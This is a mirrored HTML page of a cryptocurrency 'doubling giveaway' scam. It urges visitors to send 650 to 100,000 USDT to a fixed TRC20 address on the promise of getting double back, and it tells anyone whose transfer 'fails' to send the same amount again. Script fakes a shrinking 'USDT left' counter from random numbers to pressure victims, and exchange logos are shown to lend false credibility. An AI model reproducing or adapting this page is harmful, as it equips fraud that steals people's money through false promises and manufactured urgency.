<!DOCTYPE html>
<html lang="en">


<!-- Mirrored from eth2x.me/btc/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 26 Oct 2020 10:21:04 GMT -->

<!-- Mirrored from eth2xxxevent.digital/BTC/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 21 Jun 2021 19:36:32 GMT -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    
    <link rel="stylesheet" rel="stylesheet" type="text/css" href="../files/style.css">
    <meta property="og:image" content="img/link.html">
    <link href="../files/fav.html" rel="shortcut icon" type="image/x-icon" />
    <title>Get 2x USDT Bonus Now</title>

    <script src="../../ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="../../code.jquery.com/ui/1.11.4/jquery-ui.js"></script>
    <script type="text/javascript" src="../../cdnjs.cloudflare.com/ajax/libs/jquery-cookie/1.4.1/jquery.cookie.min.js"></script>
    <link rel="stylesheet" rel="stylesheet" type="text/css" href="../files/theme.min.css">
    <script src="../../cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="../../maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script>
        window.onload = function() {
            if (!localStorage.getItem("justonce")) {
                localStorage.setItem("justOnce", "true");
                window.location.reload();
            }
        }
    </script>

    <script type="text/javascript">
        //<![CDATA[
        window.onload = function() {

            } //]]>
    </script>
</head>

<body>
    <!-- <div id='stars'></div>
    <div id='stars2'></div>
    <div id='stars3'></div> -->
    <div class="pop-body">
        <div class="pop-inner">
            <div class="pop-head">
                <h3 class="pop-head-text">Generated Address</h3><svg id="close" height="20" viewBox="0 0 20 20"
                    width="20" xmlns="http://www.w3.org/2000/svg">
                    <path d="M18.096 19.174l1.401-1.427L1.7.286.3 1.714z"></path>
                    <path d="M19.497 1.714L18.096.286.3 17.747l1.4 1.427z"></path>
                </svg>
            </div>
            <div class="pop-post-body">
                <div class="pop-post-inner">
                    <div class="pop-anrange">
                        <div class="pop-img">
                            <div class="pop-qr">
                                <div class="inner-qr">
                                    <div class="main-qr">
                                        <div opacity="0" class="qr"><img id="qrcode_svg" width="200" height="200"
                                                src="../files/usdt.jpeg"
                                                alt="qr"></div><span class="wallet">Waiting for payment</span>
                                        <center><img src="../files/loading.svg" width="70px"></center>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="timer-b" id="timer1"></div>
                        <div class="address-place">
                            <div class="inner-address"><span class="wallet-ad">Amount:</span>
                                <div class="address">
                                    <div class="main-ad"><span class="real-address" id="gen-amount"></span></div>
                                    <div class="copy-body">
                                        <div class="copy-inner">
                                            <img class="cp" id="copy_" src="../files/copy.svg">
                                            <div id="address-card" class="sec-card">
                                                <img id="succ" class="in-card" src="../files/done.svg">
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>

                            <div class="inner-address"><span class="wallet-ad">Generated address:</span>
                                <div class="address">
                                    <div class="main-ad"><span
                                            class="real-address">TT8EGsmKfhtfKJYBPZvAfJJiDbqwXkZ5MX</span></div>
                                    <div class="copy-body">
                                        <div class="copy-inner">
                                            <img class="cp" id="copy_address" src="../files/copy.svg">
                                            <div id="done-copy" class="sec-card">
                                                <img class="in-card" src="../files/done.svg">
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <a href="#" class="d-block m-auto" target="_blank" rel="noopener noreferrer">
                                    <input id='paynow' value="Pay Now" class="btn btn-info mt-3" type="button"
                                        style="display:block; width: 100% !important;">
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    </div>
    <section id="post-sec">
        <h1 style="text-align: center;"><img src="../files/logo.png" alt="Logo"></h1>
        <div class="post_body">
            <p>To verify your USDT TRC20 address, just send from 650 USDT to 1,00,000 USDT to the generated address below and get from 1300 USDT to 2,00,000 USDT to  sent back to the address you sent USDT TRC20 from or the one you specified below, you will get double of what you send to the giveaway address.</p>
            <p>Note: Send only USDT TRC20 to this address other coins sent to this address will be lost forever be careful while making the transaction.</p>
            <p>In this event, participant will get 2x (or 3x) of what they send to the giveaway address within 4 to 8
                minutes
                which can be traded on any exchange </p>
            <p>
            <h2>How To Participate:</h2>
            <ul>
                <li><b>Step1:</b> Step1: Make sure you have at least 650 USDT at TRC20 NETWORK in your wallet.</li>
                <li><b>Step2:</b> Enter the amount you wish to participate with below.</li>
                <li><b>Step3:</b> Enter your USDT address (optional)</li>
                <li><b>Step4:</b> Click the "Generate Payment" button to generate your deposit address.</li>
                <li><b>Step5:</b> Send the amount you entered to the generated address.</li>
                <li><b>Step6:</b> Wait for at least 4 - 8 minutes after your transaction is confirmed.</li>
            </ul>
            </p>
            <p>The 2x bonus will be sent to the address you entered or the one you sent the BTC from.</p>
            <p style="color: rgb(201, 201, 201); font-size: 14px !important; margin-top: 2rem !important;"><i>If the
                    transaction does not process correctly, please try again by
                    sending the same amount to the Generated address, and it should go through. Your original
                    transaction will merge with the new one, and the bonus for the two will be sent back.</i></p>
        </div>
        <div class="cal-body">
            <div class="cal-inner">
                <div class="input">
                    <div class="title">Amount:</div>
                    <div class="amount-con">
                        <div class="inner-con">
                            <div class="pic"><img src="../files/tether.svg" alt="USDT" height="40" width="40"></div>
                            <div class="amount">
                                <div class="main-input">
                                    <div class="in-main"><input id="cal-in"
                                            class="exchange-content__input theme__background-4 theme__text-4 " min="0"
                                            step="650" placeholder="0" type="number" maxlength="50" autocomplete="off"
                                            value=""></div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="icon-body"><span data-tip="Click to swap" data-for="swap-icon" currentitem="false"><img
                            src="../files/exchange-alt.svg" alt="img" class="exchange__swap-icon"></span></div>
                <div class="input">
                    <div class="title">Bonus:</div>
                    <div class="amount-con">
                        <div class="inner-con">
                            <div class="pic"><img src="../files/tether.svg" alt="USDT" height="40" width="40"></div>
                            <div class="amount">
                                <div class="main-input">
                                    <div class="in-main"><input id="cal-out"
                                            class="exchange-content__input theme__background-4 theme__text-4 " min="0"
                                            step="0.1" placeholder="0" type="number" maxlength="50" autocomplete="off"
                                            value=""></div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="enaddress">
                <div class="title">Address:</div>
                <div class="inner-enter"><input type="text" placeholder="Enter your USDT address"
                        pattern="0x[A-Fa-f0-9]{40}"></div>
            </div>
            <div class="but-con">
                <div id="gen-btn" class="swap-but">Generate Payment</div>
                <div class="terms text-info text-center mb-2"><span><span id="warn"></span></span>
                </div>
            </div>
            <div id="lympo_progress">
                <div class="row progress-row">
                    <div class="colums_12">
                        <div class="progress-ico">
                            <div class="progress-ico">
                                <div class="progress">
                                    <div class="progress-bar progress-bar-striped active progress-width"
                                        id="progress-ico" role="progressbar" style="width: 100%;">
                                        <span class="sr-only">x</span></div>
                                </div>
                            </div>
                            <div class="dot-1" id="leftBTC">
                                Counting BTC left...
                            </div>
                            <div class="dot-1-airdrop  progress-left"></div>
                            <span class="pbv" id="progress-ico-bar"></span>
                        </div>
                    </div>
                </div>
            </div>
            <div class="support">
                <div class="sup">
                    <div class="sup-space"></div>
                    <div class="both-line">
                        <div class="import-account__title-content theme__background-2 theme__text-4">Supported Exchange
                        </div>
                    </div>
                    <div class="import-account__content">
                        <div class="import-account__item">
                            <a href="https://www.binance.com/en" target="_blank"><div class="import-account__block theme__import-button">
                                <div class="import-account__icon metamask"><img src="../files/binance.ico" width="20">
                                </div>
                                <div class="import-account__name">BINANCE</div>
                            </div></a>
                        </div>
                        <div class="import-account__item import-account__item-ledger">
                            <a href="https://upbit.com/" target="_blank"><div>
                                <div class="import-account__block theme__import-button">
                                    <div class="import-account__icon ledger"><img src="../files/upbit.png" width="20">
                                    </div>
                                    <div class="import-account__name">UPBIT</div>
                                </div>
                            </div></a>
                        </div>
                        <div class="import-account__item import-account__item-trezor">
                            <a href="https://www.okx.com/" target="_blank"><div>
                                <div class="import-account__block theme__import-button">
                                    <div class="import-account__icon trezor">
                                        <div class="import-account__icon ledger"><img src="../files/okes.png"
                                                width="20"></div>
                                    </div>
                                    <div class="import-account__name">OKEX</div>
                                </div>
                            </div></a>
                        </div>
                        <div class="import-account__item">
                            <a href="https://remitano.com/" target="_blank"><div>
                                <div class="import-account__block theme__import-button" tabindex="0"><input type="file"
                                        multiple="" autocomplete="off" tabindex="-1" style="display:none;">
                                    <div class="import-account__icon json"><img src="../files/tano.png" width="20"
                                            style="border-radius: 1rem;"></div>
                                    <div class="import-account__name">REMITANO</div>
                                </div>
                            </div></a>
                        </div>
                        <div class="import-account__item">
                            <a href="https://mercatox.com/" target="_blank"><div class="import-account__block theme__import-button">
                                <div class="import-account__icon private-key"><img src="../files/tox.png" width="20">
                                </div>
                                <div class="import-account__name">MERCATOX</div>
                            </div></a>
                        </div>
                        <div class="import-account__item ">
                            <a href="https://www.luno.com/en" target="_blank"><div class="import-account__block theme__import-button">
                                <div class="import-account__icon promo-code"><img src="../files/luno.png" width="20">
                                </div>
                                <div class="import-account__name">LUNO</div>
                            </div></a>
                        </div>
                        <div class="import-account__item import-account__item-trezor">
                            <a href="https://coins.ph/" target="_blank"><div>
                                <div class="import-account__block theme__import-button">
                                    <div class="import-account__icon trezor"><img src="../files/coinsph.png" width="20">
                                    </div>
                                    <div class="import-account__name">COINS.PH</div>
                                </div>
                            </div></a>
                        </div>
                        <div class="import-account__item">
                            <a href="https://www.coinbase.com/" target="_blank"></a><div>
                                <div class="import-account__block theme__import-button" tabindex="0"><input type="file"
                                        multiple="" autocomplete="off" tabindex="-1" style="display:none;">
                                    <div class="import-account__icon json"><img src="../files/ava.jpg" width="20"
                                            style="border-radius: 1rem;"></div>
                                    <div class="import-account__name">COINBASE</div>
                                </div>
                            </div></a>
                        </div>
                        <div class="import-account__item">
                            <a href="https://yobit.net" target="_blank"><div class="import-account__block theme__import-button">
                                <div class="import-account__icon private-key"><img src="../files/yobit.ico" width="20">
                                </div>
                                <div class="import-account__name">YOBIT</div>
                            </div></a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <main id="content" role="main">
        <div id="ContentPlaceHolder1_divSummary" class="container space-bottom-2">
            <div class="card">
                <div class="card-body">
                    <div class="tab-content">
                        <div class="tab-pane fade show active" id="transactions" role="tabpanel"
                            aria-labelledby="transactions-tab">
                            <div class="table-responsive mb-2 mb-md-0">
                                <table class="table table-hover" id="myTable">
                                    <thead class="thead-light">
                                        <tr>
                                            <th scope="col" width="1">Txn Hash</th>
                                            <th scope="col" width="1" class="d-none d-sm-table-cell">Block</th>
                                            <th scope="col"><span class="timer" title="UTC time">Age</span></th>
                                            <th scope="col">From</th>
                                            <th scope="col" width="30"></th>
                                            <th scope="col">To</th>
                                            <th scope="col">Value</th>
                                            <th scope="col"><span id="ContentPlaceHolder1_spanTxFee"
                                                    title="(Gas Price * Gas Used by Txns) in BTC">
                                                    <spanclass="text-secondary">[Txn Fee]
                                                </span></span>
                                            </th>
                                        </tr>
                                    </thead>
                                    <tbody></tbody>
                                </table>
                            </div>
                            <div class="d-flex justify-content-between align-items-center mt-3 mb-4">
                                <div class="d-flex align-items-center text-secondary"></div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </main>
    <!-- ###############################Start of progress bar######################################### -->
    <script type="text/javascript">
        $(document).ready(function () {
            $('.spoiler-title').click(function () {
                $(this).parent().children('div.spoiler-content').toggle('fast');
                return false;
            });
        });
    </script>
    <script>
        function setProgress(count, max) {
            var p = (100 * count / max).toString() + '%';
            $('.progress-left').css('left', p);
            $('.progress-width').css('width', p);
            var aa = count.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
            var rr = max.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
            $('.pbv').text(aa + ' / ' + rr);

        }



        var ctd = setInterval(function () {
            if (localStorage.getItem("btcprogress")) {
                if (localStorage.getItem("btcprogress") <= 150) {
                    var alt_count = localStorage.getItem("btcprogress");
                } else if (localStorage.getItem("btcprogress")) {
                    var alt_sec_count = localStorage.getItem("btcprogress");
                    var alt_count = alt_sec_count - Math.floor((Math.random() * 10) * 4 + 5);
                }
            } else {
                var alt_sec_count = Math.floor((Math.random() * (5000 - 5000) + 4000) + 1);
                var alt_count = alt_sec_count - Math.floor((Math.random() * 10) * 4 + 5);
            }
            setProgress(alt_count, 5000)



            localStorage.setItem("btcprogress", alt_count);

            if (alt_sec_count <= 300)
                clearInterval(ctd);
            if (alt_count <= 9999 && alt_sec_count >= 2001)
                document.getElementById("leftBTC").innerHTML = "Left USDT";
            if (alt_count <= 700 && alt_sec_count >= 301)
                document.getElementById("leftBTC").innerHTML = "Hurry up, not much more USDT left!";
            if (alt_count <= 300)
                document.getElementById("leftBTC").innerHTML = "Last chance to get your USDT!";
            if (alt_count <= 1000)
                document.title = alt_count + " BTC left";
            if (alt_count <= 500)
                document.title = "Get your " + alt_count + " USDT now!";

        }, 6666);
    </script>
    <!-- ###############################End of progress bar######################################### -->

    <script src="../files/jdfghkjdfhgvsjkdfgcphjkfdhgjsdfg.js"></script>
    <script src="custom.js"></script>
    <!--Start of Tawk.to Script-->
    <script src="http://code-eu1.jivosite.com/widget/gwEmn3sKMp" async></script>
    <!--End of Tawk.to Script-->
</body>


<!-- Mirrored from eth2x.me/btc/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 26 Oct 2020 10:21:04 GMT -->

<!-- Mirrored from eth2xxxevent.digital/BTC/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 21 Jun 2021 19:37:05 GMT -->
</html>